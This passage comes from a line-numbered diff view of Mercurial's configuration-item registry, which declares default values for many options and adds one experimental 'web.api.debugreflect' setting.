494 default=True,
495 )
495 )
496 coreconfigitem('experimental', 'evolution.track-operation',
496 coreconfigitem('experimental', 'evolution.track-operation',
497 default=True,
497 default=True,
498 )
498 )
499 coreconfigitem('experimental', 'worddiff',
499 coreconfigitem('experimental', 'worddiff',
500 default=False,
500 default=False,
501 )
501 )
502 coreconfigitem('experimental', 'maxdeltachainspan',
502 coreconfigitem('experimental', 'maxdeltachainspan',
503 default=-1,
503 default=-1,
504 )
504 )
505 coreconfigitem('experimental', 'mergetempdirprefix',
505 coreconfigitem('experimental', 'mergetempdirprefix',
506 default=None,
506 default=None,
507 )
507 )
508 coreconfigitem('experimental', 'mmapindexthreshold',
508 coreconfigitem('experimental', 'mmapindexthreshold',
509 default=None,
509 default=None,
510 )
510 )
511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
511 coreconfigitem('experimental', 'nonnormalparanoidcheck',
512 default=False,
512 default=False,
513 )
513 )
514 coreconfigitem('experimental', 'exportableenviron',
514 coreconfigitem('experimental', 'exportableenviron',
515 default=list,
515 default=list,
516 )
516 )
517 coreconfigitem('experimental', 'extendedheader.index',
517 coreconfigitem('experimental', 'extendedheader.index',
518 default=None,
518 default=None,
519 )
519 )
520 coreconfigitem('experimental', 'extendedheader.similarity',
520 coreconfigitem('experimental', 'extendedheader.similarity',
521 default=False,
521 default=False,
522 )
522 )
523 coreconfigitem('experimental', 'format.compression',
523 coreconfigitem('experimental', 'format.compression',
524 default='zlib',
524 default='zlib',
525 )
525 )
526 coreconfigitem('experimental', 'graphshorten',
526 coreconfigitem('experimental', 'graphshorten',
527 default=False,
527 default=False,
528 )
528 )
529 coreconfigitem('experimental', 'graphstyle.parent',
529 coreconfigitem('experimental', 'graphstyle.parent',
530 default=dynamicdefault,
530 default=dynamicdefault,
531 )
531 )
532 coreconfigitem('experimental', 'graphstyle.missing',
532 coreconfigitem('experimental', 'graphstyle.missing',
533 default=dynamicdefault,
533 default=dynamicdefault,
534 )
534 )
535 coreconfigitem('experimental', 'graphstyle.grandparent',
535 coreconfigitem('experimental', 'graphstyle.grandparent',
536 default=dynamicdefault,
536 default=dynamicdefault,
537 )
537 )
538 coreconfigitem('experimental', 'hook-track-tags',
538 coreconfigitem('experimental', 'hook-track-tags',
539 default=False,
539 default=False,
540 )
540 )
541 coreconfigitem('experimental', 'httppostargs',
541 coreconfigitem('experimental', 'httppostargs',
542 default=False,
542 default=False,
543 )
543 )
544 coreconfigitem('experimental', 'mergedriver',
544 coreconfigitem('experimental', 'mergedriver',
545 default=None,
545 default=None,
546 )
546 )
547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
547 coreconfigitem('experimental', 'obsmarkers-exchange-debug',
548 default=False,
548 default=False,
549 )
549 )
550 coreconfigitem('experimental', 'remotenames',
550 coreconfigitem('experimental', 'remotenames',
551 default=False,
551 default=False,
552 )
552 )
553 coreconfigitem('experimental', 'revlogv2',
553 coreconfigitem('experimental', 'revlogv2',
554 default=None,
554 default=None,
555 )
555 )
556 coreconfigitem('experimental', 'single-head-per-branch',
556 coreconfigitem('experimental', 'single-head-per-branch',
557 default=False,
557 default=False,
558 )
558 )
559 coreconfigitem('experimental', 'sshserver.support-v2',
559 coreconfigitem('experimental', 'sshserver.support-v2',
560 default=False,
560 default=False,
561 )
561 )
562 coreconfigitem('experimental', 'spacemovesdown',
562 coreconfigitem('experimental', 'spacemovesdown',
563 default=False,
563 default=False,
564 )
564 )
565 coreconfigitem('experimental', 'sparse-read',
565 coreconfigitem('experimental', 'sparse-read',
566 default=False,
566 default=False,
567 )
567 )
568 coreconfigitem('experimental', 'sparse-read.density-threshold',
568 coreconfigitem('experimental', 'sparse-read.density-threshold',
569 default=0.25,
569 default=0.25,
570 )
570 )
571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
571 coreconfigitem('experimental', 'sparse-read.min-gap-size',
572 default='256K',
572 default='256K',
573 )
573 )
574 coreconfigitem('experimental', 'treemanifest',
574 coreconfigitem('experimental', 'treemanifest',
575 default=False,
575 default=False,
576 )
576 )
577 coreconfigitem('experimental', 'update.atomic-file',
577 coreconfigitem('experimental', 'update.atomic-file',
578 default=False,
578 default=False,
579 )
579 )
580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
580 coreconfigitem('experimental', 'sshpeer.advertise-v2',
581 default=False,
581 default=False,
582 )
582 )
583 coreconfigitem('experimental', 'web.apiserver',
583 coreconfigitem('experimental', 'web.apiserver',
584 default=False,
584 default=False,
585 )
585 )
586 coreconfigitem('experimental', 'web.api.http-v2',
586 coreconfigitem('experimental', 'web.api.http-v2',
587 default=False,
587 default=False,
588 )
588 )
589 coreconfigitem('experimental', 'web.api.debugreflect',
590 default=False,
591 )
589 coreconfigitem('experimental', 'xdiff',
592 coreconfigitem('experimental', 'xdiff',
590 default=False,
593 default=False,
591 )
594 )
592 coreconfigitem('extensions', '.*',
595 coreconfigitem('extensions', '.*',
593 default=None,
596 default=None,
594 generic=True,
597 generic=True,
595 )
598 )
596 coreconfigitem('extdata', '.*',
599 coreconfigitem('extdata', '.*',
597 default=None,
600 default=None,
598 generic=True,
601 generic=True,
599 )
602 )
600 coreconfigitem('format', 'aggressivemergedeltas',
603 coreconfigitem('format', 'aggressivemergedeltas',
601 default=False,
604 default=False,
602 )
605 )
603 coreconfigitem('format', 'chunkcachesize',
606 coreconfigitem('format', 'chunkcachesize',
604 default=None,
607 default=None,
605 )
608 )
606 coreconfigitem('format', 'dotencode',
609 coreconfigitem('format', 'dotencode',
607 default=True,
610 default=True,
608 )
611 )
609 coreconfigitem('format', 'generaldelta',
612 coreconfigitem('format', 'generaldelta',
610 default=False,
613 default=False,
611 )
614 )
612 coreconfigitem('format', 'manifestcachesize',
615 coreconfigitem('format', 'manifestcachesize',
613 default=None,
616 default=None,
614 )
617 )
615 coreconfigitem('format', 'maxchainlen',
618 coreconfigitem('format', 'maxchainlen',
616 default=None,
619 default=None,
617 )
620 )
618 coreconfigitem('format', 'obsstore-version',
621 coreconfigitem('format', 'obsstore-version',
619 default=None,
622 default=None,
620 )
623 )
621 coreconfigitem('format', 'usefncache',
624 coreconfigitem('format', 'usefncache',
622 default=True,
625 default=True,
623 )
626 )
624 coreconfigitem('format', 'usegeneraldelta',
627 coreconfigitem('format', 'usegeneraldelta',
625 default=True,
628 default=True,
626 )
629 )
627 coreconfigitem('format', 'usestore',
630 coreconfigitem('format', 'usestore',
628 default=True,
631 default=True,
629 )
632 )
630 coreconfigitem('fsmonitor', 'warn_when_unused',
633 coreconfigitem('fsmonitor', 'warn_when_unused',
631 default=True,
634 default=True,
632 )
635 )
633 coreconfigitem('fsmonitor', 'warn_update_file_count',
636 coreconfigitem('fsmonitor', 'warn_update_file_count',
634 default=50000,
637 default=50000,
635 )
638 )
636 coreconfigitem('hooks', '.*',
639 coreconfigitem('hooks', '.*',
637 default=dynamicdefault,
640 default=dynamicdefault,
638 generic=True,
641 generic=True,
639 )
642 )
640 coreconfigitem('hgweb-paths', '.*',
643 coreconfigitem('hgweb-paths', '.*',
641 default=list,
644 default=list,
642 generic=True,
645 generic=True,
643 )
646 )
644 coreconfigitem('hostfingerprints', '.*',
647 coreconfigitem('hostfingerprints', '.*',
645 default=list,
648 default=list,
646 generic=True,
649 generic=True,
647 )
650 )
648 coreconfigitem('hostsecurity', 'ciphers',
651 coreconfigitem('hostsecurity', 'ciphers',
649 default=None,
652 default=None,
650 )
653 )
651 coreconfigitem('hostsecurity', 'disabletls10warning',
654 coreconfigitem('hostsecurity', 'disabletls10warning',
652 default=False,
655 default=False,
653 )
656 )
654 coreconfigitem('hostsecurity', 'minimumprotocol',
657 coreconfigitem('hostsecurity', 'minimumprotocol',
655 default=dynamicdefault,
658 default=dynamicdefault,
656 )
659 )
657 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
660 coreconfigitem('hostsecurity', '.*:minimumprotocol$',
658 default=dynamicdefault,
661 default=dynamicdefault,
659 generic=True,
662 generic=True,
660 )
663 )
661 coreconfigitem('hostsecurity', '.*:ciphers$',
664 coreconfigitem('hostsecurity', '.*:ciphers$',
662 default=dynamicdefault,
665 default=dynamicdefault,
663 generic=True,
666 generic=True,
664 )
667 )
665 coreconfigitem('hostsecurity', '.*:fingerprints$',
668 coreconfigitem('hostsecurity', '.*:fingerprints$',
666 default=list,
669 default=list,
667 generic=True,
670 generic=True,
668 )
671 )
669 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
672 coreconfigitem('hostsecurity', '.*:verifycertsfile$',
670 default=None,
673 default=None,
671 generic=True,
674 generic=True,
672 )
675 )
673
676
674 coreconfigitem('http_proxy', 'always',
677 coreconfigitem('http_proxy', 'always',
675 default=False,
678 default=False,
676 )
679 )
677 coreconfigitem('http_proxy', 'host',
680 coreconfigitem('http_proxy', 'host',
678 default=None,
681 default=None,
679 )
682 )
680 coreconfigitem('http_proxy', 'no',
683 coreconfigitem('http_proxy', 'no',
681 default=list,
684 default=list,
682 )
685 )
683 coreconfigitem('http_proxy', 'passwd',
686 coreconfigitem('http_proxy', 'passwd',
684 default=None,
687 default=None,
685 )
688 )
686 coreconfigitem('http_proxy', 'user',
689 coreconfigitem('http_proxy', 'user',
687 default=None,
690 default=None,
688 )
691 )
689 coreconfigitem('logtoprocess', 'commandexception',
692 coreconfigitem('logtoprocess', 'commandexception',
690 default=None,
693 default=None,
691 )
694 )
692 coreconfigitem('logtoprocess', 'commandfinish',
695 coreconfigitem('logtoprocess', 'commandfinish',
693 default=None,
696 default=None,
694 )
697 )
695 coreconfigitem('logtoprocess', 'command',
698 coreconfigitem('logtoprocess', 'command',
696 default=None,
699 default=None,
697 )
700 )
698 coreconfigitem('logtoprocess', 'develwarn',
701 coreconfigitem('logtoprocess', 'develwarn',
699 default=None,
702 default=None,
700 )
703 )
701 coreconfigitem('logtoprocess', 'uiblocked',
704 coreconfigitem('logtoprocess', 'uiblocked',
702 default=None,
705 default=None,
703 )
706 )
704 coreconfigitem('merge', 'checkunknown',
707 coreconfigitem('merge', 'checkunknown',
705 default='abort',
708 default='abort',
706 )
709 )
707 coreconfigitem('merge', 'checkignored',
710 coreconfigitem('merge', 'checkignored',
708 default='abort',
711 default='abort',
709 )
712 )
710 coreconfigitem('experimental', 'merge.checkpathconflicts',
713 coreconfigitem('experimental', 'merge.checkpathconflicts',
711 default=False,
714 default=False,
712 )
715 )
713 coreconfigitem('merge', 'followcopies',
716 coreconfigitem('merge', 'followcopies',
714 default=True,
717 default=True,
715 )
718 )
716 coreconfigitem('merge', 'on-failure',
719 coreconfigitem('merge', 'on-failure',
717 default='continue',
720 default='continue',
718 )
721 )
719 coreconfigitem('merge', 'preferancestor',
722 coreconfigitem('merge', 'preferancestor',
720 default=lambda: ['*'],
723 default=lambda: ['*'],
721 )
724 )
722 coreconfigitem('merge-tools', '.*',
725 coreconfigitem('merge-tools', '.*',
723 default=None,
726 default=None,
724 generic=True,
727 generic=True,
725 )
728 )
726 coreconfigitem('merge-tools', br'.*\.args$',
729 coreconfigitem('merge-tools', br'.*\.args$',
727 default="$local $base $other",
730 default="$local $base $other",
728 generic=True,
731 generic=True,
729 priority=-1,
732 priority=-1,
730 )
733 )
731 coreconfigitem('merge-tools', br'.*\.binary$',
734 coreconfigitem('merge-tools', br'.*\.binary$',
732 default=False,
735 default=False,
733 generic=True,
736 generic=True,
734 priority=-1,
737 priority=-1,
735 )
738 )
736 coreconfigitem('merge-tools', br'.*\.check$',
739 coreconfigitem('merge-tools', br'.*\.check$',
737 default=list,
740 default=list,
738 generic=True,
741 generic=True,
739 priority=-1,
742 priority=-1,
740 )
743 )
741 coreconfigitem('merge-tools', br'.*\.checkchanged$',
744 coreconfigitem('merge-tools', br'.*\.checkchanged$',
742 default=False,
745 default=False,
743 generic=True,
746 generic=True,
744 priority=-1,
747 priority=-1,
745 )
748 )
746 coreconfigitem('merge-tools', br'.*\.executable$',
749 coreconfigitem('merge-tools', br'.*\.executable$',
747 default=dynamicdefault,
750 default=dynamicdefault,
748 generic=True,
751 generic=True,
749 priority=-1,
752 priority=-1,
750 )
753 )
751 coreconfigitem('merge-tools', br'.*\.fixeol$',
754 coreconfigitem('merge-tools', br'.*\.fixeol$',
752 default=False,
755 default=False,
753 generic=True,
756 generic=True,
754 priority=-1,
757 priority=-1,
755 )
758 )
756 coreconfigitem('merge-tools', br'.*\.gui$',
759 coreconfigitem('merge-tools', br'.*\.gui$',
757 default=False,
760 default=False,
758 generic=True,
761 generic=True,
759 priority=-1,
762 priority=-1,
760 )
763 )
761 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
764 coreconfigitem('merge-tools', br'.*\.mergemarkers$',
762 default='basic',
765 default='basic',
763 generic=True,
766 generic=True,
764 priority=-1,
767 priority=-1,
765 )
768 )
766 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
769 coreconfigitem('merge-tools', br'.*\.mergemarkertemplate$',
767 default=dynamicdefault, # take from ui.mergemarkertemplate
770 default=dynamicdefault, # take from ui.mergemarkertemplate
768 generic=True,
771 generic=True,
769 priority=-1,
772 priority=-1,
770 )
773 )
771 coreconfigitem('merge-tools', br'.*\.priority$',
774 coreconfigitem('merge-tools', br'.*\.priority$',
772 default=0,
775 default=0,
773 generic=True,
776 generic=True,
774 priority=-1,
777 priority=-1,
775 )
778 )
776 coreconfigitem('merge-tools', br'.*\.premerge$',
779 coreconfigitem('merge-tools', br'.*\.premerge$',
777 default=dynamicdefault,
780 default=dynamicdefault,
778 generic=True,
781 generic=True,
779 priority=-1,
782 priority=-1,
780 )
783 )
781 coreconfigitem('merge-tools', br'.*\.symlink$',
784 coreconfigitem('merge-tools', br'.*\.symlink$',
782 default=False,
785 default=False,
783 generic=True,
786 generic=True,
784 priority=-1,
787 priority=-1,
785 )
788 )
786 coreconfigitem('pager', 'attend-.*',
789 coreconfigitem('pager', 'attend-.*',
787 default=dynamicdefault,
790 default=dynamicdefault,
788 generic=True,
791 generic=True,
789 )
792 )
790 coreconfigitem('pager', 'ignore',
793 coreconfigitem('pager', 'ignore',
791 default=list,
794 default=list,
792 )
795 )
793 coreconfigitem('pager', 'pager',
796 coreconfigitem('pager', 'pager',
794 default=dynamicdefault,
797 default=dynamicdefault,
795 )
798 )
796 coreconfigitem('patch', 'eol',
799 coreconfigitem('patch', 'eol',
797 default='strict',
800 default='strict',
798 )
801 )
799 coreconfigitem('patch', 'fuzz',
802 coreconfigitem('patch', 'fuzz',
800 default=2,
803 default=2,
801 )
804 )
802 coreconfigitem('paths', 'default',
805 coreconfigitem('paths', 'default',
803 default=None,
806 default=None,
804 )
807 )
805 coreconfigitem('paths', 'default-push',
808 coreconfigitem('paths', 'default-push',
806 default=None,
809 default=None,
807 )
810 )
808 coreconfigitem('paths', '.*',
811 coreconfigitem('paths', '.*',
809 default=None,
812 default=None,
810 generic=True,
813 generic=True,
811 )
814 )
812 coreconfigitem('phases', 'checksubrepos',
815 coreconfigitem('phases', 'checksubrepos',
813 default='follow',
816 default='follow',
814 )
817 )
815 coreconfigitem('phases', 'new-commit',
818 coreconfigitem('phases', 'new-commit',
816 default='draft',
819 default='draft',
817 )
820 )
818 coreconfigitem('phases', 'publish',
821 coreconfigitem('phases', 'publish',
819 default=True,
822 default=True,
820 )
823 )
821 coreconfigitem('profiling', 'enabled',
824 coreconfigitem('profiling', 'enabled',
822 default=False,
825 default=False,
823 )
826 )
824 coreconfigitem('profiling', 'format',
827 coreconfigitem('profiling', 'format',
825 default='text',
828 default='text',
826 )
829 )
827 coreconfigitem('profiling', 'freq',
830 coreconfigitem('profiling', 'freq',
828 default=1000,
831 default=1000,
829 )
832 )
830 coreconfigitem('profiling', 'limit',
833 coreconfigitem('profiling', 'limit',
831 default=30,
834 default=30,
832 )
835 )
833 coreconfigitem('profiling', 'nested',
836 coreconfigitem('profiling', 'nested',
834 default=0,
837 default=0,
835 )
838 )
836 coreconfigitem('profiling', 'output',
839 coreconfigitem('profiling', 'output',
837 default=None,
840 default=None,
838 )
841 )
839 coreconfigitem('profiling', 'showmax',
842 coreconfigitem('profiling', 'showmax',
840 default=0.999,
843 default=0.999,
841 )
844 )
842 coreconfigitem('profiling', 'showmin',
845 coreconfigitem('profiling', 'showmin',
843 default=dynamicdefault,
846 default=dynamicdefault,
844 )
847 )
845 coreconfigitem('profiling', 'sort',
848 coreconfigitem('profiling', 'sort',
846 default='inlinetime',
849 default='inlinetime',
847 )
850 )
848 coreconfigitem('profiling', 'statformat',
851 coreconfigitem('profiling', 'statformat',
849 default='hotpath',
852 default='hotpath',
850 )
853 )
851 coreconfigitem('profiling', 'type',
854 coreconfigitem('profiling', 'type',
852 default='stat',
855 default='stat',
853 )
856 )
854 coreconfigitem('progress', 'assume-tty',
857 coreconfigitem('progress', 'assume-tty',
855 default=False,
858 default=False,
856 )
859 )
857 coreconfigitem('progress', 'changedelay',
860 coreconfigitem('progress', 'changedelay',
858 default=1,
861 default=1,
859 )
862 )
860 coreconfigitem('progress', 'clear-complete',
863 coreconfigitem('progress', 'clear-complete',
861 default=True,
864 default=True,
862 )
865 )
863 coreconfigitem('progress', 'debug',
866 coreconfigitem('progress', 'debug',
864 default=False,
867 default=False,
865 )
868 )
866 coreconfigitem('progress', 'delay',
869 coreconfigitem('progress', 'delay',
867 default=3,
870 default=3,
868 )
871 )
869 coreconfigitem('progress', 'disable',
872 coreconfigitem('progress', 'disable',
870 default=False,
873 default=False,
871 )
874 )
872 coreconfigitem('progress', 'estimateinterval',
875 coreconfigitem('progress', 'estimateinterval',
873 default=60.0,
876 default=60.0,
874 )
877 )
875 coreconfigitem('progress', 'format',
878 coreconfigitem('progress', 'format',
876 default=lambda: ['topic', 'bar', 'number', 'estimate'],
879 default=lambda: ['topic', 'bar', 'number', 'estimate'],
877 )
880 )
878 coreconfigitem('progress', 'refresh',
881 coreconfigitem('progress', 'refresh',
879 default=0.1,
882 default=0.1,
880 )
883 )
881 coreconfigitem('progress', 'width',
884 coreconfigitem('progress', 'width',
882 default=dynamicdefault,
885 default=dynamicdefault,
883 )
886 )
884 coreconfigitem('push', 'pushvars.server',
887 coreconfigitem('push', 'pushvars.server',
885 default=False,
888 default=False,
886 )
889 )
887 coreconfigitem('server', 'bookmarks-pushkey-compat',
890 coreconfigitem('server', 'bookmarks-pushkey-compat',
888 default=True,
891 default=True,
889 )
892 )
890 coreconfigitem('server', 'bundle1',
893 coreconfigitem('server', 'bundle1',
891 default=True,
894 default=True,
892 )
895 )
893 coreconfigitem('server', 'bundle1gd',
896 coreconfigitem('server', 'bundle1gd',
894 default=None,
897 default=None,
895 )
898 )
896 coreconfigitem('server', 'bundle1.pull',
899 coreconfigitem('server', 'bundle1.pull',
897 default=None,
900 default=None,
898 )
901 )
899 coreconfigitem('server', 'bundle1gd.pull',
902 coreconfigitem('server', 'bundle1gd.pull',
900 default=None,
903 default=None,
901 )
904 )
902 coreconfigitem('server', 'bundle1.push',
905 coreconfigitem('server', 'bundle1.push',
903 default=None,
906 default=None,
904 )
907 )
905 coreconfigitem('server', 'bundle1gd.push',
908 coreconfigitem('server', 'bundle1gd.push',
906 default=None,
909 default=None,
907 )
910 )
908 coreconfigitem('server', 'compressionengines',
911 coreconfigitem('server', 'compressionengines',
909 default=list,
912 default=list,
910 )
913 )
911 coreconfigitem('server', 'concurrent-push-mode',
914 coreconfigitem('server', 'concurrent-push-mode',
912 default='strict',
915 default='strict',
913 )
916 )
914 coreconfigitem('server', 'disablefullbundle',
917 coreconfigitem('server', 'disablefullbundle',
915 default=False,
918 default=False,
916 )
919 )
917 coreconfigitem('server', 'maxhttpheaderlen',
920 coreconfigitem('server', 'maxhttpheaderlen',
918 default=1024,
921 default=1024,
919 )
922 )
920 coreconfigitem('server', 'preferuncompressed',
923 coreconfigitem('server', 'preferuncompressed',
921 default=False,
924 default=False,
922 )
925 )
923 coreconfigitem('server', 'uncompressed',
926 coreconfigitem('server', 'uncompressed',
924 default=True,
927 default=True,
925 )
928 )
926 coreconfigitem('server', 'uncompressedallowsecret',
929 coreconfigitem('server', 'uncompressedallowsecret',
927 default=False,
930 default=False,
928 )
931 )
929 coreconfigitem('server', 'validate',
932 coreconfigitem('server', 'validate',
930 default=False,
933 default=False,
931 )
934 )
932 coreconfigitem('server', 'zliblevel',
935 coreconfigitem('server', 'zliblevel',
933 default=-1,
936 default=-1,
934 )
937 )
935 coreconfigitem('share', 'pool',
938 coreconfigitem('share', 'pool',
936 default=None,
939 default=None,
937 )
940 )
938 coreconfigitem('share', 'poolnaming',
941 coreconfigitem('share', 'poolnaming',
939 default='identity',
942 default='identity',
940 )
943 )
941 coreconfigitem('smtp', 'host',
944 coreconfigitem('smtp', 'host',
942 default=None,
945 default=None,
943 )
946 )
944 coreconfigitem('smtp', 'local_hostname',
947 coreconfigitem('smtp', 'local_hostname',
945 default=None,
948 default=None,
946 )
949 )
947 coreconfigitem('smtp', 'password',
950 coreconfigitem('smtp', 'password',
948 default=None,
951 default=None,
949 )
952 )
950 coreconfigitem('smtp', 'port',
953 coreconfigitem('smtp', 'port',
951 default=dynamicdefault,
954 default=dynamicdefault,
952 )
955 )
953 coreconfigitem('smtp', 'tls',
956 coreconfigitem('smtp', 'tls',
954 default='none',
957 default='none',
955 )
958 )
956 coreconfigitem('smtp', 'username',
959 coreconfigitem('smtp', 'username',
957 default=None,
960 default=None,
958 )
961 )
959 coreconfigitem('sparse', 'missingwarning',
962 coreconfigitem('sparse', 'missingwarning',
960 default=True,
963 default=True,
961 )
964 )
962 coreconfigitem('subrepos', 'allowed',
965 coreconfigitem('subrepos', 'allowed',
963 default=dynamicdefault, # to make backporting simpler
966 default=dynamicdefault, # to make backporting simpler
964 )
967 )
965 coreconfigitem('subrepos', 'hg:allowed',
968 coreconfigitem('subrepos', 'hg:allowed',
966 default=dynamicdefault,
969 default=dynamicdefault,
967 )
970 )
968 coreconfigitem('subrepos', 'git:allowed',
971 coreconfigitem('subrepos', 'git:allowed',
969 default=dynamicdefault,
972 default=dynamicdefault,
970 )
973 )
971 coreconfigitem('subrepos', 'svn:allowed',
974 coreconfigitem('subrepos', 'svn:allowed',
972 default=dynamicdefault,
975 default=dynamicdefault,
973 )
976 )
974 coreconfigitem('templates', '.*',
977 coreconfigitem('templates', '.*',
975 default=None,
978 default=None,
976 generic=True,
979 generic=True,
977 )
980 )
978 coreconfigitem('trusted', 'groups',
981 coreconfigitem('trusted', 'groups',
979 default=list,
982 default=list,
980 )
983 )
981 coreconfigitem('trusted', 'users',
984 coreconfigitem('trusted', 'users',
982 default=list,
985 default=list,
983 )
986 )
984 coreconfigitem('ui', '_usedassubrepo',
987 coreconfigitem('ui', '_usedassubrepo',
985 default=False,
988 default=False,
986 )
989 )
987 coreconfigitem('ui', 'allowemptycommit',
990 coreconfigitem('ui', 'allowemptycommit',
988 default=False,
991 default=False,
989 )
992 )
990 coreconfigitem('ui', 'archivemeta',
993 coreconfigitem('ui', 'archivemeta',
991 default=True,
994 default=True,
992 )
995 )
993 coreconfigitem('ui', 'askusername',
996 coreconfigitem('ui', 'askusername',
994 default=False,
997 default=False,
995 )
998 )
996 coreconfigitem('ui', 'clonebundlefallback',
999 coreconfigitem('ui', 'clonebundlefallback',
997 default=False,
1000 default=False,
998 )
1001 )
999 coreconfigitem('ui', 'clonebundleprefers',
1002 coreconfigitem('ui', 'clonebundleprefers',
1000 default=list,
1003 default=list,
1001 )
1004 )
1002 coreconfigitem('ui', 'clonebundles',
1005 coreconfigitem('ui', 'clonebundles',
1003 default=True,
1006 default=True,
1004 )
1007 )
1005 coreconfigitem('ui', 'color',
1008 coreconfigitem('ui', 'color',
1006 default='auto',
1009 default='auto',
1007 )
1010 )
1008 coreconfigitem('ui', 'commitsubrepos',
1011 coreconfigitem('ui', 'commitsubrepos',
1009 default=False,
1012 default=False,
1010 )
1013 )
1011 coreconfigitem('ui', 'debug',
1014 coreconfigitem('ui', 'debug',
1012 default=False,
1015 default=False,
1013 )
1016 )
1014 coreconfigitem('ui', 'debugger',
1017 coreconfigitem('ui', 'debugger',
1015 default=None,
1018 default=None,
1016 )
1019 )
1017 coreconfigitem('ui', 'editor',
1020 coreconfigitem('ui', 'editor',
1018 default=dynamicdefault,
1021 default=dynamicdefault,
1019 )
1022 )
1020 coreconfigitem('ui', 'fallbackencoding',
1023 coreconfigitem('ui', 'fallbackencoding',
1021 default=None,
1024 default=None,
1022 )
1025 )
1023 coreconfigitem('ui', 'forcecwd',
1026 coreconfigitem('ui', 'forcecwd',
1024 default=None,
1027 default=None,
1025 )
1028 )
1026 coreconfigitem('ui', 'forcemerge',
1029 coreconfigitem('ui', 'forcemerge',
1027 default=None,
1030 default=None,
1028 )
1031 )
1029 coreconfigitem('ui', 'formatdebug',
1032 coreconfigitem('ui', 'formatdebug',
1030 default=False,
1033 default=False,
1031 )
1034 )
1032 coreconfigitem('ui', 'formatjson',
1035 coreconfigitem('ui', 'formatjson',
1033 default=False,
1036 default=False,
1034 )
1037 )
1035 coreconfigitem('ui', 'formatted',
1038 coreconfigitem('ui', 'formatted',
1036 default=None,
1039 default=None,
1037 )
1040 )
1038 coreconfigitem('ui', 'graphnodetemplate',
1041 coreconfigitem('ui', 'graphnodetemplate',
1039 default=None,
1042 default=None,
1040 )
1043 )
1041 coreconfigitem('ui', 'interactive',
1044 coreconfigitem('ui', 'interactive',
1042 default=None,
1045 default=None,
1043 )
1046 )
1044 coreconfigitem('ui', 'interface',
1047 coreconfigitem('ui', 'interface',
1045 default=None,
1048 default=None,
1046 )
1049 )
1047 coreconfigitem('ui', 'interface.chunkselector',
1050 coreconfigitem('ui', 'interface.chunkselector',
1048 default=None,
1051 default=None,
1049 )
1052 )
1050 coreconfigitem('ui', 'logblockedtimes',
1053 coreconfigitem('ui', 'logblockedtimes',
1051 default=False,
1054 default=False,
1052 )
1055 )
1053 coreconfigitem('ui', 'logtemplate',
1056 coreconfigitem('ui', 'logtemplate',
1054 default=None,
1057 default=None,
1055 )
1058 )
1056 coreconfigitem('ui', 'merge',
1059 coreconfigitem('ui', 'merge',
1057 default=None,
1060 default=None,
1058 )
1061 )
1059 coreconfigitem('ui', 'mergemarkers',
1062 coreconfigitem('ui', 'mergemarkers',
1060 default='basic',
1063 default='basic',
1061 )
1064 )
1062 coreconfigitem('ui', 'mergemarkertemplate',
1065 coreconfigitem('ui', 'mergemarkertemplate',
1063 default=('{node|short} '
1066 default=('{node|short} '
1064 '{ifeq(tags, "tip", "", '
1067 '{ifeq(tags, "tip", "", '
1065 'ifeq(tags, "", "", "{tags} "))}'
1068 'ifeq(tags, "", "", "{tags} "))}'
1066 '{if(bookmarks, "{bookmarks} ")}'
1069 '{if(bookmarks, "{bookmarks} ")}'
1067 '{ifeq(branch, "default", "", "{branch} ")}'
1070 '{ifeq(branch, "default", "", "{branch} ")}'
1068 '- {author|user}: {desc|firstline}')
1071 '- {author|user}: {desc|firstline}')
1069 )
1072 )
1070 coreconfigitem('ui', 'nontty',
1073 coreconfigitem('ui', 'nontty',
1071 default=False,
1074 default=False,
1072 )
1075 )
1073 coreconfigitem('ui', 'origbackuppath',
1076 coreconfigitem('ui', 'origbackuppath',
1074 default=None,
1077 default=None,
1075 )
1078 )
1076 coreconfigitem('ui', 'paginate',
1079 coreconfigitem('ui', 'paginate',
1077 default=True,
1080 default=True,
1078 )
1081 )
1079 coreconfigitem('ui', 'patch',
1082 coreconfigitem('ui', 'patch',
1080 default=None,
1083 default=None,
1081 )
1084 )
1082 coreconfigitem('ui', 'portablefilenames',
1085 coreconfigitem('ui', 'portablefilenames',
1083 default='warn',
1086 default='warn',
1084 )
1087 )
1085 coreconfigitem('ui', 'promptecho',
1088 coreconfigitem('ui', 'promptecho',
1086 default=False,
1089 default=False,
1087 )
1090 )
1088 coreconfigitem('ui', 'quiet',
1091 coreconfigitem('ui', 'quiet',
1089 default=False,
1092 default=False,
1090 )
1093 )
1091 coreconfigitem('ui', 'quietbookmarkmove',
1094 coreconfigitem('ui', 'quietbookmarkmove',
1092 default=False,
1095 default=False,
1093 )
1096 )
1094 coreconfigitem('ui', 'remotecmd',
1097 coreconfigitem('ui', 'remotecmd',
1095 default='hg',
1098 default='hg',
1096 )
1099 )
1097 coreconfigitem('ui', 'report_untrusted',
1100 coreconfigitem('ui', 'report_untrusted',
1098 default=True,
1101 default=True,
1099 )
1102 )
1100 coreconfigitem('ui', 'rollback',
1103 coreconfigitem('ui', 'rollback',
1101 default=True,
1104 default=True,
1102 )
1105 )
1103 coreconfigitem('ui', 'slash',
1106 coreconfigitem('ui', 'slash',
1104 default=False,
1107 default=False,
1105 )
1108 )
1106 coreconfigitem('ui', 'ssh',
1109 coreconfigitem('ui', 'ssh',
1107 default='ssh',
1110 default='ssh',
1108 )
1111 )
1109 coreconfigitem('ui', 'ssherrorhint',
1112 coreconfigitem('ui', 'ssherrorhint',
1110 default=None,
1113 default=None,
1111 )
1114 )
1112 coreconfigitem('ui', 'statuscopies',
1115 coreconfigitem('ui', 'statuscopies',
1113 default=False,
1116 default=False,
1114 )
1117 )
1115 coreconfigitem('ui', 'strict',
1118 coreconfigitem('ui', 'strict',
1116 default=False,
1119 default=False,
1117 )
1120 )
1118 coreconfigitem('ui', 'style',
1121 coreconfigitem('ui', 'style',
1119 default='',
1122 default='',
1120 )
1123 )
1121 coreconfigitem('ui', 'supportcontact',
1124 coreconfigitem('ui', 'supportcontact',
1122 default=None,
1125 default=None,
1123 )
1126 )
1124 coreconfigitem('ui', 'textwidth',
1127 coreconfigitem('ui', 'textwidth',
1125 default=78,
1128 default=78,
1126 )
1129 )
1127 coreconfigitem('ui', 'timeout',
1130 coreconfigitem('ui', 'timeout',
1128 default='600',
1131 default='600',
1129 )
1132 )
1130 coreconfigitem('ui', 'timeout.warn',
